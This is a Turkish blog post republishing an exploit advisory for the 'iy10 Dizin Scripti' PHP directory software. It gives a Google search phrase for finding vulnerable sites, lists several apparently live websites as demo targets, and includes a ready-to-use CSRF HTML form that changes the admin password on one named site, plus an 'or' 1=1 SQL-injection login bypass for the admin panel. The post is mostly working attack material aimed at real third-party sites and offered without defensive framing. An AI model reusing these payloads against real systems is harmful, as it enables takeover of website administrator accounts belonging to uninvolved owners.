10 Aralık 2015 Perşembe

iy10 Dizin Scripti - Multiple Vulnerabilities (CSRF & Authentication Bypass)

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Şeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
       KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version 
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek için tıklayın !"
 ################++ DEMO ++ #######################################
http://www.servisservisi.com
http://dafv.net
http://toplist.anaforum.net
http://linkekle.xyz
http://sinbatanitim.com
http://www.dizinim.tk/yeniler/
http://www.alacaticesme.com/yeniler/
http://www.hgndata.com/yeniler/
http://www.toplist.biz.tr/yeniler/
################## ++ CSRF Admin Password Change Exploit ++ ######################################
<html>
  <body>
    <form action="http://www.servisservisi.com/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
   <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
################# ++ SQL Injection with Authentication Bypass ++###########################################
http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1
############################################################

Hiç yorum yok:

Yorum Gönder